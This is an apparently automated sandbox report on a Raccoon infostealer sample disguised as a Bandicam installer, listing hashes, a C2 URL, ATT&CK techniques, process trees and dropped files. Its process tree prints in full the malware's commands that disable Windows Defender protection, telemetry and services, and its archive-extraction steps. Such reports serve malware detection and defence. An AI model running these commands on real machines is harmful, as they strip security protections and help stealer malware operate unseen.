raccoon | 5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03

Analysis

max time kernel
156s
max time network
162s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
08-05-2022 15:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.exe
Size

28.9MB
MD5

08ad3edb11e3b0c511e979c8105faaee
SHA1

687cb2f37095fb79531a950a1eef9b80945dbd83
SHA256

5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03
SHA512

b6e7aea4ddaf3a0504a937a0deef27d5e03e839c4aa611a1bb2ff3bd20fece2bba62a629c26a136329d56696290b61b31327d5e22d0c7fa6d7e1a5352a59cf52

Score

10^/10

raccoon c763e433ef51ff4b6c545800e4ba3b3b1a2ea077 evasion stealer themida trojan

Malware Config

Extracted

Family

raccoon

Botnet

c763e433ef51ff4b6c545800e4ba3b3b1a2ea077

Attributes

url4cnc
https://telete.in/jbitchsucks

rc4.plain

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Raccoon Stealer Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2468-231-0x0000000000400000-0x0000000000493000-memory.dmp	family_raccoon
behavioral2/memory/2468-233-0x0000000000400000-0x0000000000493000-memory.dmp	family_raccoon
behavioral2/memory/2468-234-0x0000000000400000-0x0000000000493000-memory.dmp	family_raccoon

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Executes dropped EXE 11 IoCs

Processes:

5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmpBandicam.4.5.8.1673.exeBandicam.4.5.8.1673.tmp7z.exe7z.exe7z.exe7z.exe7z.exe7z.exetGBpax_SqZ.exetGBpax_SqZ.exe

pid	process
4976	5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmp
1812	Bandicam.4.5.8.1673.exe
1192	Bandicam.4.5.8.1673.tmp
3272	7z.exe
4852	7z.exe
628	7z.exe
1132	7z.exe
2700	7z.exe
1632	7z.exe
2900	tGBpax_SqZ.exe
2468	tGBpax_SqZ.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

tGBpax_SqZ.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	tGBpax_SqZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	tGBpax_SqZ.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmpWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	WScript.exe

Loads dropped DLL 12 IoCs

Processes:

5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmpBandicam.4.5.8.1673.tmp7z.exe7z.exe7z.exe7z.exe7z.exe7z.exetGBpax_SqZ.exe

pid	process
4976	5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmp
1192	Bandicam.4.5.8.1673.tmp
1192	Bandicam.4.5.8.1673.tmp
1192	Bandicam.4.5.8.1673.tmp
1192	Bandicam.4.5.8.1673.tmp
3272	7z.exe
4852	7z.exe
628	7z.exe
1132	7z.exe
2700	7z.exe
1632	7z.exe
2900	tGBpax_SqZ.exe

Themida packer 5 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\ProgramData\kkDvi\tGBpax_SqZ.exe	themida
C:\ProgramData\kkDvi\extracted\tGBpax_SqZ.exe	themida
behavioral2/memory/2900-222-0x0000000000630000-0x0000000000B8C000-memory.dmp	themida
behavioral2/memory/2900-223-0x0000000000630000-0x0000000000B8C000-memory.dmp	themida
C:\ProgramData\kkDvi\tGBpax_SqZ.exe	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

tGBpax_SqZ.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA tGBpax_SqZ.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

tGBpax_SqZ.exe

description pid process target process

PID 2900 set thread context of 2468 2900 tGBpax_SqZ.exe tGBpax_SqZ.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	tGBpax_SqZ.exe

description	pid	process	target process
PID 2900 set thread context of 2468	2900	tGBpax_SqZ.exe	tGBpax_SqZ.exe

Drops file in Program Files directory 2 IoCs

Processes:

5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmp

description	ioc	process
File opened for modification	C:\Program Files (x86)\Bandicam.4.5.8.1673.exe	5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmp
File created	C:\Program Files (x86)\is-M7PQE.tmp	5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4564 timeout.exe

pid	process
4564	timeout.exe

Modifies registry class 1 IoCs

Processes:

5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmp

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings	5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmp

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmpBandicam.4.5.8.1673.tmptGBpax_SqZ.exe

pid	process
4976	5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmp
4976	5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmp
1192	Bandicam.4.5.8.1673.tmp
1192	Bandicam.4.5.8.1673.tmp
2900	tGBpax_SqZ.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

Processes:

7z.exe7z.exe7z.exe7z.exe7z.exe7z.exetGBpax_SqZ.exe

description	pid	process
Token: SeRestorePrivilege	3272	7z.exe
Token: 35	3272	7z.exe
Token: SeSecurityPrivilege	3272	7z.exe
Token: SeSecurityPrivilege	3272	7z.exe
Token: SeRestorePrivilege	4852	7z.exe
Token: 35	4852	7z.exe
Token: SeSecurityPrivilege	4852	7z.exe
Token: SeSecurityPrivilege	4852	7z.exe
Token: SeRestorePrivilege	628	7z.exe
Token: 35	628	7z.exe
Token: SeSecurityPrivilege	628	7z.exe
Token: SeSecurityPrivilege	628	7z.exe
Token: SeRestorePrivilege	1132	7z.exe
Token: 35	1132	7z.exe
Token: SeSecurityPrivilege	1132	7z.exe
Token: SeSecurityPrivilege	1132	7z.exe
Token: SeRestorePrivilege	2700	7z.exe
Token: 35	2700	7z.exe
Token: SeSecurityPrivilege	2700	7z.exe
Token: SeSecurityPrivilege	2700	7z.exe
Token: SeRestorePrivilege	1632	7z.exe
Token: 35	1632	7z.exe
Token: SeSecurityPrivilege	1632	7z.exe
Token: SeSecurityPrivilege	1632	7z.exe
Token: SeDebugPrivilege	2900	tGBpax_SqZ.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmp

pid process

4976 5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.exe5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmpBandicam.4.5.8.1673.exeWScript.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4228 wrote to memory of 4976	4228	5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.exe	5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmp
PID 4228 wrote to memory of 4976	4228	5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.exe	5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmp
PID 4228 wrote to memory of 4976	4228	5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.exe	5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmp
PID 4976 wrote to memory of 1812	4976	5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmp	Bandicam.4.5.8.1673.exe
PID 4976 wrote to memory of 1812	4976	5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmp	Bandicam.4.5.8.1673.exe
PID 4976 wrote to memory of 1812	4976	5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmp	Bandicam.4.5.8.1673.exe
PID 1812 wrote to memory of 1192	1812	Bandicam.4.5.8.1673.exe	Bandicam.4.5.8.1673.tmp
PID 1812 wrote to memory of 1192	1812	Bandicam.4.5.8.1673.exe	Bandicam.4.5.8.1673.tmp
PID 1812 wrote to memory of 1192	1812	Bandicam.4.5.8.1673.exe	Bandicam.4.5.8.1673.tmp
PID 4976 wrote to memory of 176	4976	5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmp	WScript.exe
PID 4976 wrote to memory of 176	4976	5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmp	WScript.exe
PID 4976 wrote to memory of 176	4976	5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmp	WScript.exe
PID 176 wrote to memory of 3560	176	WScript.exe	cmd.exe
PID 176 wrote to memory of 3560	176	WScript.exe	cmd.exe
PID 176 wrote to memory of 3560	176	WScript.exe	cmd.exe
PID 176 wrote to memory of 2516	176	WScript.exe	cmd.exe
PID 176 wrote to memory of 2516	176	WScript.exe	cmd.exe
PID 176 wrote to memory of 2516	176	WScript.exe	cmd.exe
PID 176 wrote to memory of 3660	176	WScript.exe	cmd.exe
PID 176 wrote to memory of 3660	176	WScript.exe	cmd.exe
PID 176 wrote to memory of 3660	176	WScript.exe	cmd.exe
PID 3660 wrote to memory of 4564	3660	cmd.exe	timeout.exe
PID 3660 wrote to memory of 4564	3660	cmd.exe	timeout.exe
PID 3660 wrote to memory of 4564	3660	cmd.exe	timeout.exe
PID 2516 wrote to memory of 3172	2516	cmd.exe	mode.com
PID 2516 wrote to memory of 3172	2516	cmd.exe	mode.com
PID 2516 wrote to memory of 3172	2516	cmd.exe	mode.com
PID 2516 wrote to memory of 3272	2516	cmd.exe	7z.exe
PID 2516 wrote to memory of 3272	2516	cmd.exe	7z.exe
PID 3560 wrote to memory of 2472	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 2472	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 2472	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 1680	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 1680	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 1680	3560	cmd.exe	reg.exe
PID 2516 wrote to memory of 4852	2516	cmd.exe	7z.exe
PID 2516 wrote to memory of 4852	2516	cmd.exe	7z.exe
PID 3560 wrote to memory of 3048	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 3048	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 3048	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 5008	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 5008	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 5008	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 5020	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 5020	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 5020	3560	cmd.exe	reg.exe
PID 2516 wrote to memory of 628	2516	cmd.exe	7z.exe
PID 2516 wrote to memory of 628	2516	cmd.exe	7z.exe
PID 2516 wrote to memory of 1132	2516	cmd.exe	7z.exe
PID 2516 wrote to memory of 1132	2516	cmd.exe	7z.exe
PID 3560 wrote to memory of 744	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 744	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 744	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 716	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 716	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 716	3560	cmd.exe	reg.exe
PID 2516 wrote to memory of 2700	2516	cmd.exe	7z.exe
PID 2516 wrote to memory of 2700	2516	cmd.exe	7z.exe
PID 3560 wrote to memory of 4092	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 4092	3560	cmd.exe	reg.exe
PID 3560 wrote to memory of 4092	3560	cmd.exe	reg.exe
PID 2516 wrote to memory of 1632	2516	cmd.exe	7z.exe
PID 2516 wrote to memory of 1632	2516	cmd.exe	7z.exe
PID 3560 wrote to memory of 4736	3560	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.exe
"C:\Users\Admin\AppData\Local\Temp\5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4228

C:\Users\Admin\AppData\Local\Temp\is-A5K3N.tmp\5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmp
"C:\Users\Admin\AppData\Local\Temp\is-A5K3N.tmp\5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmp" /SL5="$80046,29544558,760832,C:\Users\Admin\AppData\Local\Temp\5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4976

C:\Program Files (x86)\Bandicam.4.5.8.1673.exe
"C:\Program Files (x86)\Bandicam.4.5.8.1673.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1812

C:\Users\Admin\AppData\Local\Temp\is-S3TVM.tmp\Bandicam.4.5.8.1673.tmp
"C:\Users\Admin\AppData\Local\Temp\is-S3TVM.tmp\Bandicam.4.5.8.1673.tmp" /SL5="$101FC,22575714,93696,C:\Program Files (x86)\Bandicam.4.5.8.1673.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1192

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\kkDvi\MMF.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:176

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\kkDvi\DisableOAVProtection.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:3560

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
5⤵
PID:2472

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
5⤵
PID:1680

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
5⤵
PID:5008

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
5⤵
PID:3048

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
5⤵
PID:5020

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
5⤵
PID:744

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
5⤵
PID:716

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
5⤵
PID:4092

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
5⤵
PID:4736

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
5⤵
PID:3344

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
5⤵
PID:4516

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
5⤵
PID:4120

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
5⤵
PID:652

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
5⤵
PID:4312

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
5⤵
PID:2348

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
5⤵
PID:1912

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
5⤵
PID:3216

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
5⤵
PID:1304

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
5⤵
PID:924

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
5⤵
PID:4572

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
5⤵
PID:1612

C:\Windows\SysWOW64\reg.exe
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
5⤵
PID:4704

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
5⤵
PID:3664

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:3888

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:2264

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:1464

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:4708

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:3520

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:4796

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:3608

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
5⤵
- Modifies security service
PID:2696

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:4416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\kkDvi\main.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:2516

C:\Windows\SysWOW64\mode.com
mode 65,10
5⤵
PID:3172

C:\ProgramData\kkDvi\7z.exe
7z.exe e file.zip -p___________5230pwd29950pwd13288___________ -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3272

C:\ProgramData\kkDvi\7z.exe
7z.exe e extracted/file_5.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4852

C:\ProgramData\kkDvi\7z.exe
7z.exe e extracted/file_4.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:628

C:\ProgramData\kkDvi\7z.exe
7z.exe e extracted/file_3.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1132

C:\ProgramData\kkDvi\7z.exe
7z.exe e extracted/file_1.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1632

C:\ProgramData\kkDvi\tGBpax_SqZ.exe
"tGBpax_SqZ.exe"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2900

C:\ProgramData\kkDvi\tGBpax_SqZ.exe
"tGBpax_SqZ.exe"
6⤵
- Executes dropped EXE
PID:2468

C:\ProgramData\kkDvi\7z.exe
7z.exe e extracted/file_2.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2700

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\kkDvi\DiskRemoval.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:3660

C:\Windows\SysWOW64\timeout.exe
timeout /T 60 /NOBREAK
5⤵
- Delays execution with timeout.exe
PID:4564

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Bandicam.4.5.8.1673.exe
Filesize
21.9MB

MD5
a6627fb2c2e3874325259bf000571fdf

SHA1
3d521136f3445aae539080e74a80d40a67d543a2

SHA256
dbc86639649df20836a209414eeaed1e83b4e0d26d82f5e94c671d36d9da7738

SHA512
122a996be74b2a971fac731a6058e59d2c57497db52ced2e6a8ad46e81c367111a0e3a0d32dfc585a77b43d84d7e0b1e7a00f465e8f9ad66d63df1fe309bdca3

Download Submit
C:\Program Files (x86)\Bandicam.4.5.8.1673.exe
Filesize
21.9MB

MD5
a6627fb2c2e3874325259bf000571fdf

SHA1
3d521136f3445aae539080e74a80d40a67d543a2

SHA256
dbc86639649df20836a209414eeaed1e83b4e0d26d82f5e94c671d36d9da7738

SHA512
122a996be74b2a971fac731a6058e59d2c57497db52ced2e6a8ad46e81c367111a0e3a0d32dfc585a77b43d84d7e0b1e7a00f465e8f9ad66d63df1fe309bdca3

Download Submit
C:\ProgramData\kkDvi\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\kkDvi\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\kkDvi\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\kkDvi\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\kkDvi\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\kkDvi\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\kkDvi\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\kkDvi\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\kkDvi\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
